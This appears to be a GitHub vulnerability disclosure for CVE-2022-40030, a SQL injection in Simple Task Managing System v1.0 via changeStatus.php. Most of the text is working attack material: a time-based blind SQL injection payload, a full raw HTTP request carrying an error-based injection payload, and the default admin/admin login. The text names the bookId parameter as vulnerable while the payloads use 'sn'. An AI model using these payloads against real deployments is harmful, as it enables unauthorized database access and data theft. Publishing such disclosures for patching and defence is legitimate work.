Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2022-40030 Simple Task Managing System - SQL injection

Simple Task Managing System v1.0 exists to contain a SQL injection vulnerability via the bookId parameter at /changeStatus.php

username:admin password:admin ----> {ip}/changeStatus.php

Supplier: https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/changeStatus.php has SQL injection

Payload: http://localhost:80/cve/Task Managing System in PHP/changeStatus.php?sn=test' AND (SELECT 9797 FROM (SELECT(SLEEP(5)))kKbl) AND 'PmTS'='PmTS&tn=1&status=2

SQL injection because $shortName can be closed

image

Payload

GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/changeStatus.php?sn=test' AND ROW(6066,2526)>(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(6066=6066,1))),0x71787a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 5176 UNION SELECT 2058 UNION SELECT 2430 UNION SELECT 5444)a GROUP BY x) AND 'MkOa'='MkOa
 HTTP/1.1
Host: localhost
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cve/Task%20Managing%20System%20in%20PHP/changeStatus.php?sn=test
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=hvkotkilavedcvtchro67huf9i
Connection: close

image

image